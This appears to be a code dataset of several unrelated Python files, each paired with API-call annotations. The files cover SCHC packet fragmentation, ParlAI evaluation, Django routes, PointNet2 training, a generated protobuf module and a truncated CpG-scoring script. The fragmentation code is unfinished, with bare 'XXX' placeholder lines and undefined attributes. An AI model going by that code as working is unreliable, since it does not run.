# 1085 +-- ... --+- ... -+-+- ... -+
# 1086 | Rule ID | DTag |W| 0..0 | TODO
# 1087 +-- ... --+- ... -+-+- ... -+
# 1088
# 1089 Figure 13: All-0 empty format fragment
# XXX
raise RuntimeError("Not implemented yet: XXX")
def unpack_fragment_or_ack(self):
pass
def pack_ack(self, XXX):
pass
#---------------------------------------------------------------------------
INTER_FRAGMENT_DELAY = 1.0 # seconds
WAIT_BITMAP_TIMEOUT = 5.0 # seconds
class WindowAckModeSender:
"""The fragmentation manager handles the logic of the fragment sending etc.
"""
def __init__(self, system_manager, fragment_format_XXX_unused, full_packet,
rule_id, dtag, window_max_size, fragment_size):
self.rule_id = rule_id
self.dtag = dtag
R = 16 # header size
T = 4 # DTag size
N = 4 # FCN size
M = 8 # MIC size
BITMAP_SIZE = 8 # bits
self.system_manager = system_manager
# XXX: use soichi code again:
#fragment.fp = fragment_format #XXX: hack
#self.fragment = fragment.fragment(
# srcbuf=full_packet, rule_id=rule_id, dtag=dtag,
# noack=False, window_size=window_size)
##self.fragment = fragment.fragment(
## srcbuf=full_packet, dtag=dtag, rid=rule_id)
#print(self.fragment.__dict__) #XXX
self.fragment_size = fragment_size
self.nb_fragment = (len(full_packet) + fragment_size-1) // fragment_size
# 1376 Intially, when a fragmented packet need to be sent, the window is set
# 1377 to 0, a local_bit map is set to 0, and FCN is set the the highe
# 1378 possible value depending on the number of fragment that will be sent
# 1379 in the window (INIT STATE).
self.state = "INIT"
self.window_index = 0
# (some of these variables are duplicates of the class fragment.fragment)
self.full_packet = full_packet
self.full_packet_position = 0
self.window_index = 0
self.window_max_size = window_max_size
self.R = R
self.T = T
self.N = N
self.M = M
self.format_mgr = SchcFragmentFormat(R=R, T=T, N=N, M=M, mode="window")
print("STATE INIT, fragmentation parameters:")
print(" nb_fragment={}".format(self.nb_fragment))
print(" fragment_size={}".format(fragment_size))
print(" R(header size)={}".format(self.R))
print(" T(DTag size)={}".format(self.T))
print(" N(FCN size)={}".format(self.N))
self.init_current_window()
def init_current_window(self):
# pre-compute the fragments to send in the window, and init variables.
# (the fragment_size is allowed to be changed between windows)
assert self.full_packet_position < len(self.full_packet)
remaining_nb_byte = len(self.full_packet) - self.full_packet_position
remaining_nb_fragment = (
(remaining_nb_byte + self.fragment_size-1) // self.fragment_size )
assert remaining_nb_fragment > 0
self.is_last_window = (remaining_nb_fragment < self.window_max_size)
if not self.is_last_window:
self.window_size = self.window_max_size
else: self.window_size = remaining_nb_fragment
p, fs = self.full_packet_position, self.fragment_size
self.fragment_list = [ self.full_packet[p+i*fs:p+(i+1)*(fs)]
for i in range(self.window_size)]
self.window_fragment_index = 0
print("window #{} last={} nb_frag={}\n frag={}".format(
self.window_size, self.is_last_window, self.window_size,
self.fragment_list))
#--------------------------------------------------
def start(self):
assert self.state == "INIT"
self.state = "SEND"
self.send_current_fragment()
def get_current_fcn(self):
fi = self.window_fragment_index
if self.is_last_window and fi == self.window_size-1:
# 913 are expected when there is no error. The FCN for the last fragment
# 914 is an all-1. It is also important to note that, for No ACK mode or
return self.format_mgr.get_all_1(), True
else:
return self.window_size-1 - fi, False
def send_current_fragment(self):
assert self.state == "SEND"
frag_content = self.fragment_list[self.window_fragment_index]
advertized_fcn, is_very_last_fragment = self.get_current_fcn()
if is_very_last_fragment:
mic = self.mic
else: mic = b""
full_fragment = self.format_mgr.pack_fragment(
rule_id = self.rule_id, dtag = self.dtag,
window_index = self.window_index,
advertized_fcn = advertized_fcn,
payload = frag_content, mic = mic
)
self.system_manager.send_packet(full_fragment)
# 1384 regulation rules or constraints imposed by the applications. Each
# 1385 time a fragment is sent the FCN is decreased of one value and the
# 1386 bitmap is set. The send state can be leaved for different reasons
# XXX: is the bitmap the one of the FCN?
if self.window_fragment_index == self.window_size-1:
# 1386 bitmap is set. The send state can be leaved for different reasons
# 1387 (for both reasons it goes to WAIT BITMAP STATE):
self.state = "WAIT BITMAP"
if is_very_last_fragment:
# 1471 [...] FCN==0 & more frags [...]
# 1389 o The FCN reaches value 0 and there are more fragments. In that
# 1390 case an all-0 fragmet is sent and the timer is set. The sender
# 1391 will wait for the bitmap acknowledged by the receiver.
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window_index, False))
else:
# 1471 [...] last frag [...]
# 1393 o The last fragment is sent. In that case an all-1 fragment with
# 1394 the MIC is sent and the sender will wait for the bitmap
# 1395 acknowledged by the receiver. The sender set a timer to wait for
# 1396 the ack.
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window_index, True))
else:
self.window_fragment_index += 1
self.system_manager.add_event(
INTER_FRAGMENT_DELAY, self.event_next_fragment, ())
#--------------------------------------------------
def send_empty_fragment(self):
# 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
# 1411 last fragment has been sent) fragment is sent to ask the receiver to
if self.is_last_window:
advertized_fcn = self.format_mgr.get_all_0()
else: advertized_fcn = self.format_mgr.get_all_1()
XXX
self.system_manager.send_packet(empty_fragment)
def is_finished(self):
return not (self.position < len(self.full_packet))
def get_next_fragment_real(self):
return self.fragment.next_fragment(self.fragment_size)
def event_next_fragment(self):
assert self.state == "SEND"
# 1464 [...] send Window + frag(FCN)
self.send_current_fragment()
def event_wait_bitmap_timeout_check(self, window_index, final):
assert window_index <= self.window_index
if window_index != self.window_index:
return # not really a time out (as window_index has progressed)
assert self.state == "WAIT BITMAP"
# 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
# 1411 last fragment has been sent) fragment is sent to ask the receiver to
# 1412 resent its bitmap. The window number is not changed.
print("WAIT BITMAP: timeout")
warnings.warn("XXX:should implement MAX_ATTEMPTS")
self.send_empty_fragment()
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window, True))
def event_packet(self, raw_packet):
#print("RECEIVE", raw_packet)
if self.state == "INIT":
print("ERROR: unexpected packet in state INIT", raw_packet)
return
elif self.state == "SEND":
print("ERROR: unexpected packet in state SEND", raw_packet)
return
elif self.state == "WAIT BITMAP":
# XXX:how do we know the packet format?:
self.process_ack(raw_packet)
else: raise RuntimeError("unexpected state", self.state)
def process_ack(self, raw_packet):
warnings.warn("XXX:hardwired formats, sizes, constants")
window, bitmap = struct.unpack(b"!BB", raw_packet)
bitmap = bitmap >> 1 # XXX - only for hardcoded case
print("ACK", window, bitmap, self.bitmap)
# 1662 If the window number on the received bitmap is correct, the sender
if window != self.window:
print("ERROR: bad window number", window, self.window)
return
if bitmap & ~self.bitmap != 0:
print("ERROR: inconsistent bitmap", bitmap, self.bitmap)
# XXX: what to do? - should not happen except for last
return
resend_bitmap = self.bitmap & ~bitmap
if resend_bitmap == 0:
# 1662 If the window number on the received bitmap is correct, the sender
# 1663 compare the local bitmap with the received bitmap. If they are equal
# 1664 all the fragments sent during the window have been well received. If
if not self.is_finished():
# 1665 at least one fragment need to be sent, the sender clear the bitmap,
# 1666 stop the timer and move its sending window to the next value. If no
# XXX: (optional) stop timer
self.window_index += 1
self.window = self.window+1 # XXX!!: modulo
nb_remaining_fragment = (self.nb_fragment
- self.window_size * self.window_index)
print("UPDATE:", nb_remaining_fragment, self.nb_fragment,
self.window_size, self.window_index)
self.fcn = min(nb_remaining_fragment, self.max_fcn) # XXX:factor in
unfinished, packet = self.get_next_fragment()
self.state = "SEND"
self.send_fragment_and_prepare_next(packet, unfinished)
else:
# 1667 more fragments have to be sent, then the fragmented packet
# 1668 transmission is terminated.
self.state = "END"
self.event_transmission_completed()
else:
# 1670 If some fragments are missing (not set in the bit map) then the
# 1671 sender resend the missing fragments. When the retransmission is
# 1672 finished, it start listening to the bitmap (even if a All-0 or All-1
# 1673 has not been sent during the retransmission) and returns to the
# 1674 waiting bitmap state.
# 1685 If the local-bitmap is different from the received bitmap the counter
# 1686 Attemps is increased and the sender resend the missing fragments
# 1687 again, when a MAX_ATTEMPS is reached the sender sends an Abort and
# 1688 goes to error.
raise NotImplementedError("XXX not implemented yet, sorry")
def event_transmission_completed(self):
print("transmssion completed")
def get_current_fragment(self):
print("fragment window={} fcn={} current_frag_index={}".format(
self.window, self.fcn, self.fragment_index))
header = struct.pack(b"!BB", self.window, self.fcn)
return header + bytes(self.content[self.fragment_index].encode("ascii"))
def process_ack_old(self, raw_packet):
# Next fragment
self.window = (self.window+1) % 2 # protocol
self.fcn = self.max_fcn_per_window # - because it will be the first of the new window
self.fragment_index += 1 # internal data structure
if self.fragment_index == len(self.content):
print("Finished trasnmission of fragments")
return b""
if self.fragment_index == len(self.content)-1:
self.fcn = 1 # protocol - because it is the end of the content in this case
return self.get_current_fragment() # XXX + "MIC"
else:
return self.get_current_fragment()
#---------------------------------------------------------------------------
|
[
"sys.path.append",
"BitBuffer.BitBuffer.__init__",
"struct.unpack",
"struct.pack",
"warnings.warn"
] |
[((120, 158), 'sys.path.append', 'sys.path.append', (['"""../../PLIDO-tanupoo"""'], {}), "('../../PLIDO-tanupoo')\n", (135, 158), False, 'import sys\n'), ((210, 238), 'sys.path.append', 'sys.path.append', (['"""../python"""'], {}), "('../python')\n", (225, 238), False, 'import sys\n'), ((490, 547), 'BitBuffer.BitBuffer.__init__', 'BitBufferModule.BitBuffer.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (524, 547), True, 'import BitBuffer as BitBufferModule\n'), ((13291, 13341), 'warnings.warn', 'warnings.warn', (['"""XXX:should implement MAX_ATTEMPTS"""'], {}), "('XXX:should implement MAX_ATTEMPTS')\n", (13304, 13341), False, 'import warnings\n'), ((14098, 14154), 'warnings.warn', 'warnings.warn', (['"""XXX:hardwired formats, sizes, constants"""'], {}), "('XXX:hardwired formats, sizes, constants')\n", (14111, 14154), False, 'import warnings\n'), ((14180, 14213), 'struct.unpack', 'struct.unpack', (["b'!BB'", 'raw_packet'], {}), "(b'!BB', raw_packet)\n", (14193, 14213), False, 'import struct\n'), ((17343, 17385), 'struct.pack', 'struct.pack', (["b'!BB'", 'self.window', 'self.fcn'], {}), "(b'!BB', self.window, self.fcn)\n", (17354, 17385), False, 'import struct\n')]
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
# <NAME>, KAIST: 2017-present
"""Basic example which iterates through the tasks specified and
evaluates the given model on them.
For example:
`python examples/eval_model.py -t "babi:Task1k:2" -m "repeat_label"`
or
`python examples/eval_model.py -t "#CornellMovie" -m "ir_baseline" -mp "-lp 0.5"`
"""
import torch
from parlai.core.agents import create_agent
from parlai.core.worlds import create_task
from parlai.core.params import ParlaiParser
import random
import pdb
import logging, sys
from examples.train_model_seq2seq_ldecay import run_eval
def main():
# Get command line arguments
parser = ParlaiParser(True, True)
parser.set_defaults(datatype='valid')
parser.add_argument('-logger', '--log-file', default='', help='log file name')
parser.add_argument('--local-human', default=True, type='bool', help='log file name')
parser.add_argument('--display-examples', default=False, type='bool', help='')
parser.add_argument('--split-gpus', type=bool, default=False, help='Split gpus for a large model.')
opt = parser.parse_args()
# Set logging
if opt['log_file'] is not '':
logger = logging.getLogger('Evaluation: Seq2seq')
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
if 'log_file' in opt:
logfile = logging.FileHandler(opt['log_file'], 'w')
logfile.setFormatter(fmt)
logger.addHandler(logfile)
logger.info('[ COMMAND: %s ]' % ' '.join(sys.argv))
# Possibly build a dictionary (not all models do this).
#assert opt['dict_file'] is None, '[ Put dict file ]'
# Create model and assign it to the specified task
agent = create_agent(opt)
world = create_task(opt, agent)
run_eval(agent, opt, 'valid', write_log=True, logger=logger, generate=True, local_human=opt['local_human'])
world.shutdown()
if __name__ == '__main__':
main()
|
[
"logging.FileHandler",
"parlai.core.worlds.create_task",
"logging.StreamHandler",
"parlai.core.params.ParlaiParser",
"logging.Formatter",
"examples.train_model_seq2seq_ldecay.run_eval",
"parlai.core.agents.create_agent",
"logging.getLogger"
] |
[((905, 929), 'parlai.core.params.ParlaiParser', 'ParlaiParser', (['(True)', '(True)'], {}), '(True, True)\n', (917, 929), False, 'from parlai.core.params import ParlaiParser\n'), ((2156, 2173), 'parlai.core.agents.create_agent', 'create_agent', (['opt'], {}), '(opt)\n', (2168, 2173), False, 'from parlai.core.agents import create_agent\n'), ((2186, 2209), 'parlai.core.worlds.create_task', 'create_task', (['opt', 'agent'], {}), '(opt, agent)\n', (2197, 2209), False, 'from parlai.core.worlds import create_task\n'), ((2219, 2330), 'examples.train_model_seq2seq_ldecay.run_eval', 'run_eval', (['agent', 'opt', '"""valid"""'], {'write_log': '(True)', 'logger': 'logger', 'generate': '(True)', 'local_human': "opt['local_human']"}), "(agent, opt, 'valid', write_log=True, logger=logger, generate=True,\n local_human=opt['local_human'])\n", (2227, 2330), False, 'from examples.train_model_seq2seq_ldecay import run_eval\n'), ((1439, 1479), 'logging.getLogger', 'logging.getLogger', (['"""Evaluation: Seq2seq"""'], {}), "('Evaluation: Seq2seq')\n", (1456, 1479), False, 'import logging, sys\n'), ((1532, 1601), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s: %(message)s"""', '"""%m/%d/%Y %I:%M:%S %p"""'], {}), "('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')\n", (1549, 1601), False, 'import logging, sys\n'), ((1620, 1643), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (1641, 1643), False, 'import logging, sys\n'), ((1765, 1806), 'logging.FileHandler', 'logging.FileHandler', (["opt['log_file']", '"""w"""'], {}), "(opt['log_file'], 'w')\n", (1784, 1806), False, 'import logging, sys\n')]
|
from django.urls import path
from django.conf.urls import url
from reporter import views as r_views
from djgeojson.views import GeoJSONLayerView
from reporter import models as r_models
urlpatterns = [
path('home', r_views.Prohome, name='home'),
path('report/<str:code>/', r_views.Proreporter, name='code'),
path('data.geojson', GeoJSONLayerView.as_view(model=r_models.RealMapping), name='data')
]
|
[
"djgeojson.views.GeoJSONLayerView.as_view",
"django.urls.path"
] |
[((206, 248), 'django.urls.path', 'path', (['"""home"""', 'r_views.Prohome'], {'name': '"""home"""'}), "('home', r_views.Prohome, name='home')\n", (210, 248), False, 'from django.urls import path\n'), ((254, 314), 'django.urls.path', 'path', (['"""report/<str:code>/"""', 'r_views.Proreporter'], {'name': '"""code"""'}), "('report/<str:code>/', r_views.Proreporter, name='code')\n", (258, 314), False, 'from django.urls import path\n'), ((341, 393), 'djgeojson.views.GeoJSONLayerView.as_view', 'GeoJSONLayerView.as_view', ([], {'model': 'r_models.RealMapping'}), '(model=r_models.RealMapping)\n', (365, 393), False, 'from djgeojson.views import GeoJSONLayerView\n')]
|
import os
import sys
pointnet2_dir = os.path.split(os.path.abspath(__file__))[0]
main_dir = "/".join(pointnet2_dir.split("/")[0:-1])
pointnet2_ops_lib_dir = main_dir+"/pointnet2_ops_lib/"
sys.path.insert(0,main_dir)
sys.path.insert(0,pointnet2_ops_lib_dir)
import hydra
import omegaconf
import pytorch_lightning as pl
import torch
from pytorch_lightning.loggers import TensorBoardLogger
from surgeon_pytorch import Inspect,get_layers
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def hydra_params_to_dotdict(hparams):
def _to_dot_dict(cfg):
res = {}
for k, v in cfg.items():
if isinstance(v, omegaconf.DictConfig):
res.update(
{k + "." + subk: subv for subk, subv in _to_dot_dict(v).items()}
)
elif isinstance(v, (str, int, float, bool)):
res[k] = v
return res
return _to_dot_dict(hparams)
@hydra.main("config/config.yaml")
def main(cfg):
model = hydra.utils.instantiate(cfg.task_model, hydra_params_to_dotdict(cfg))
early_stop_callback = pl.callbacks.EarlyStopping(patience=5)
checkpoint_callback = pl.callbacks.ModelCheckpoint(
monitor="val_acc",
mode="max",
save_top_k=2,
filepath=os.path.join(
cfg.task_model.name, "{epoch}-{val_loss:.2f}-{val_acc:.3f}"
),
verbose=True,
)
trainer = pl.Trainer(
gpus=list(cfg.gpus),
max_epochs=cfg.epochs,
early_stop_callback=early_stop_callback,
checkpoint_callback=checkpoint_callback,
distributed_backend=cfg.distrib_backend
)
print(get_layers(model))
# trainer.fit(model)
# trainer.test(model)
if __name__ == "__main__":
main()
|
[
"os.path.abspath",
"sys.path.insert",
"surgeon_pytorch.get_layers",
"hydra.main",
"pytorch_lightning.callbacks.EarlyStopping",
"os.path.join"
] |
[((191, 219), 'sys.path.insert', 'sys.path.insert', (['(0)', 'main_dir'], {}), '(0, main_dir)\n', (206, 219), False, 'import sys\n'), ((219, 260), 'sys.path.insert', 'sys.path.insert', (['(0)', 'pointnet2_ops_lib_dir'], {}), '(0, pointnet2_ops_lib_dir)\n', (234, 260), False, 'import sys\n'), ((954, 986), 'hydra.main', 'hydra.main', (['"""config/config.yaml"""'], {}), "('config/config.yaml')\n", (964, 986), False, 'import hydra\n'), ((1115, 1153), 'pytorch_lightning.callbacks.EarlyStopping', 'pl.callbacks.EarlyStopping', ([], {'patience': '(5)'}), '(patience=5)\n', (1141, 1153), True, 'import pytorch_lightning as pl\n'), ((52, 77), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (67, 77), False, 'import os\n'), ((1670, 1687), 'surgeon_pytorch.get_layers', 'get_layers', (['model'], {}), '(model)\n', (1680, 1687), False, 'from surgeon_pytorch import Inspect, get_layers\n'), ((1296, 1369), 'os.path.join', 'os.path.join', (['cfg.task_model.name', '"""{epoch}-{val_loss:.2f}-{val_acc:.3f}"""'], {}), "(cfg.task_model.name, '{epoch}-{val_loss:.2f}-{val_acc:.3f}')\n", (1308, 1369), False, 'import os\n')]
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yacht/config/proto/policy.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from yacht.config.proto import feature_extractor_pb2 as yacht_dot_config_dot_proto_dot_feature__extractor__pb2
from yacht.config.proto import net_architecture_pb2 as yacht_dot_config_dot_proto_dot_net__architecture__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yacht/config/proto/policy.proto',
package='yacht.config.proto',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x1fyacht/config/proto/policy.proto\x12\x12yacht.config.proto\x1a*yacht/config/proto/feature_extractor.proto\x1a)yacht/config/proto/net_architecture.proto\"\xb7\x01\n\x0cPolicyConfig\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x15\n\ractivation_fn\x18\x02 \x01(\t\x12\x45\n\x11\x66\x65\x61ture_extractor\x18\x03 \x01(\x0b\x32*.yacht.config.proto.FeatureExtractorConfig\x12;\n\x08net_arch\x18\x04 \x01(\x0b\x32).yacht.config.proto.NetArchitectureConfigb\x06proto3')
,
dependencies=[yacht_dot_config_dot_proto_dot_feature__extractor__pb2.DESCRIPTOR,yacht_dot_config_dot_proto_dot_net__architecture__pb2.DESCRIPTOR,])
_POLICYCONFIG = _descriptor.Descriptor(
name='PolicyConfig',
full_name='yacht.config.proto.PolicyConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='yacht.config.proto.PolicyConfig.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_fn', full_name='yacht.config.proto.PolicyConfig.activation_fn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature_extractor', full_name='yacht.config.proto.PolicyConfig.feature_extractor', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='net_arch', full_name='yacht.config.proto.PolicyConfig.net_arch', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=143,
serialized_end=326,
)
_POLICYCONFIG.fields_by_name['feature_extractor'].message_type = yacht_dot_config_dot_proto_dot_feature__extractor__pb2._FEATUREEXTRACTORCONFIG
_POLICYCONFIG.fields_by_name['net_arch'].message_type = yacht_dot_config_dot_proto_dot_net__architecture__pb2._NETARCHITECTURECONFIG
DESCRIPTOR.message_types_by_name['PolicyConfig'] = _POLICYCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PolicyConfig = _reflection.GeneratedProtocolMessageType('PolicyConfig', (_message.Message,), dict(
DESCRIPTOR = _POLICYCONFIG,
__module__ = 'yacht.config.proto.policy_pb2'
# @@protoc_insertion_point(class_scope:yacht.config.proto.PolicyConfig)
))
_sym_db.RegisterMessage(PolicyConfig)
# @@protoc_insertion_point(module_scope)
|
[
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor"
] |
[((455, 481), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (479, 481), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((2479, 2854), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""feature_extractor"""', 'full_name': '"""yacht.config.proto.PolicyConfig.feature_extractor"""', 'index': '(2)', 'number': '(3)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='feature_extractor', full_name=\n 'yacht.config.proto.PolicyConfig.feature_extractor', index=2, number=3,\n type=11, cpp_type=10, label=1, has_default_value=False, default_value=\n None, message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None, serialized_options=None, file\n =DESCRIPTOR)\n", (2506, 2854), True, 'from google.protobuf import descriptor as _descriptor\n'), ((2874, 3226), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""net_arch"""', 'full_name': '"""yacht.config.proto.PolicyConfig.net_arch"""', 'index': '(3)', 'number': '(4)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='net_arch', full_name=\n 'yacht.config.proto.PolicyConfig.net_arch', index=3, number=4, type=11,\n cpp_type=10, label=1, has_default_value=False, default_value=None,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (2901, 3226), True, 'from google.protobuf import descriptor as _descriptor\n')]
|
#!/usr/bin/env python
# coding: utf-8
import argparse
import concurrent.futures
import logging
import numpy as np
import pandas as pd
import pyBigWig
import pysam
import os
import re
import sys
from Bio import SeqIO
from Bio.Seq import Seq
from collections import Counter
from numpy.lib.stride_tricks import sliding_window_view
from operator import itemgetter
from tqdm import tqdm
os.environ["CUDA_VISIBLE_DEVICES"] = ""
def get_args():
"""
Get arguments from command line with argparse.
"""
parser = argparse.ArgumentParser(
prog='aligned_bam_to_cpg_scores.py',
description="""Calculate CpG positions and scores from an aligned bam file. Outputs raw and
coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available).""")
parser.add_argument("-b", "--bam",
required=True,
metavar="input.bam",
help="The aligned BAM file.")
parser.add_argument("-f", "--fasta",
required=True,
metavar="ref.fasta",
help="The reference fasta file.")
parser.add_argument("-o", "--output_label",
required=True,
metavar="label",
help="Label for output files, which results in [label].bed/bw.")
parser.add_argument("-p", "--pileup_mode",
required=False,
choices=["model", "count"],
default="model",
help="Use a model-based approach to score modifications across sites (model) "
"or a simple count-based approach (count). [default = %(default)s]")
parser.add_argument("-d", "--model_dir",
required=False,
default=None,
metavar="/path/to/model/dir",
help="Full path to the directory containing the model (*.pb files) to load. [default = None]")
parser.add_argument("-m", "--modsites",
required=False,
choices=["denovo", "reference"],
default="denovo",
help="Only output CG sites with a modification probability > 0 "
"(denovo), or output all CG sites based on the "
"supplied reference fasta (reference). [default = %(default)s]")
parser.add_argument("-c", "--min_coverage",
required=False,
default=4,
type=int,
metavar="int",
help="Minimum coverage required for filtered outputs. [default: %(default)d]")
parser.add_argument("-q", "--min_mapq",
required=False,
default=0,
type=int,
metavar="int",
help="Ignore alignments with MAPQ < N. [default: %(default)d]")
parser.add_argument("-a", "--hap_tag",
required=False,
default="HP",
metavar="TAG",
help="The SAM tag containing haplotype information. [default: %(default)s]")
parser.add_argument("-s", "--chunksize",
required=False,
default=500000,
type=int,
metavar="int",
help="Break reference regions into chunks "
"of this size for parallel processing. [default = %(default)d]")
parser.add_argument("-t", "--threads",
required=False,
default=1,
type=int,
metavar="int",
help="Number of threads for parallel processing. [default = %(default)d]")
return parser.parse_args()
def setup_logging(output_label):
"""
Set up logging to file.
"""
logname = "{}-aligned_bam_to_cpg_scores.log".format(output_label)
# ensure logging file does not exist, if so remove
if os.path.exists(logname):
os.remove(logname)
# set up logging to file
logging.basicConfig(filename=logname,
format="%(asctime)s: %(levelname)s: %(message)s",
datefmt='%d-%b-%y %H:%M:%S',
level=logging.DEBUG)
def log_args(args):
"""
Record argument settings in log file.
"""
logging.info("Using following argument settings:")
for arg, val in vars(args).items():
logging.info("\t--{}: {}".format(arg, val))
def get_regions_to_process(input_bam, input_fasta, chunksize, modsites, pileup_mode, model_dir, min_mapq, hap_tag):
"""
Breaks reference regions into smaller regions based on chunk
size specified. Returns a list of lists that can be used for
multiprocessing. Each sublist contains:
[bam path (str), fasta path (str), modsites (str),
reference name (str), start coordinate (int), stop coordinate (int)]
:param input_bam: Path to input bam file. (str)
:param input_fasta: Path to reference fasta file. (str)
:param chunksize: Chunk size (default = 500000). (int)
:param modsites: Filtering method. (str: "denovo", "reference")
:param pileup_mode: Site modification calling method. (str: "model", "count")
:param model_dir: Full path to model directory to load (if supplied), otherwise is None.
:param min_mapq: Minimum mapping quality score. (int)
:param hap_tag: The SAM tag label containing haplotype information. (str)
:return regions_to_process: List of lists containing region sizes. (list)
"""
logging.info("get_regions_to_process: Starting chunking.")
# open the input bam file with pysam
bamIn = pysam.AlignmentFile(input_bam, 'rb')
# empty list to store sublists with region information
regions_to_process = []
# iterate over reference names and their corresponding lengths
references = zip(bamIn.references, bamIn.lengths)
for ref, length in references:
start = 1
while start < length:
end = start + chunksize
if end < length:
regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, start, end - 1, min_mapq, hap_tag])
else:
regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, start, length, min_mapq, hap_tag])
start = start + chunksize
# close bam
bamIn.close()
logging.info("get_regions_to_process: Created {:,} region chunks.\n".format(len(regions_to_process)))
return regions_to_process
def cg_sites_from_fasta(input_fasta, ref):
"""
Gets all CG site positions from a given reference region, and
make positions keys in a dict with empty strings as vals.
:param input_fasta: A path to reference fasta file. (str)
:param ref: Reference name. (str)
:return cg_sites_ref_set: Set with all CG ref positions. (set)
"""
# open fasta with BioPython and iterated over records
with open(input_fasta) as fh:
for record in SeqIO.parse(fh, "fasta"):
# if record name matches this particular ref,
if record.id == ref:
# use regex to find all indices for 'CG' in the reference seq, e.g. the C positions
cg_sites_ref_set = {i.start() for i in re.finditer('CG', str(record.seq.upper()))}
# there may be some stretches without any CpGs in a reference region
# handle these edge cases by adding a dummy value of -1 (an impossible coordinate)
if not cg_sites_ref_set:
cg_sites_ref_set.add(-1)
# once seq is found, stop iterating
break
# make sure the ref region was matched to a ref fasta seq
if not cg_sites_ref_set:
logging.error("cg_sites_from_fasta: The sequence '{}' was not found in the reference fasta file.".format(ref))
raise ValueError('The sequence "{}" was not found in the reference fasta file!'.format(ref))
return cg_sites_ref_set
def get_mod_sequence(integers):
"""
A generator that takes an iterable of integers coding mod bases from the SAM Mm tags, and yields an iterable of
positions of sequential bases.
Example: [5, 12, 0] -> [6, 19, 20]
In above example the 6th C, 19th C, and 20th C are modified
See this example described in: https://samtools.github.io/hts-specs/SAMtags.pdf; Dec 9 2021
:param integers: Iterable of integers (parsed from SAM Mm tag). (iter)
:return mod_sequence: Iterator of integers, 1-based counts of position of modified base in set of bases. (iter)
"""
base_count = 0
for i in integers:
base_count += i + 1
yield base_count
def get_base_indices(query_seq, base, reverse):
"""
Find all occurrences of base in query sequence and make a list of their
indices. Return the list of indices.
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return: List of integers, 0-based indices of all bases in query seq. (list)
"""
if reverse == False:
return [i.start() for i in re.finditer(base, query_seq)]
# if seq stored in reverse, need reverse complement to get correct indices for base
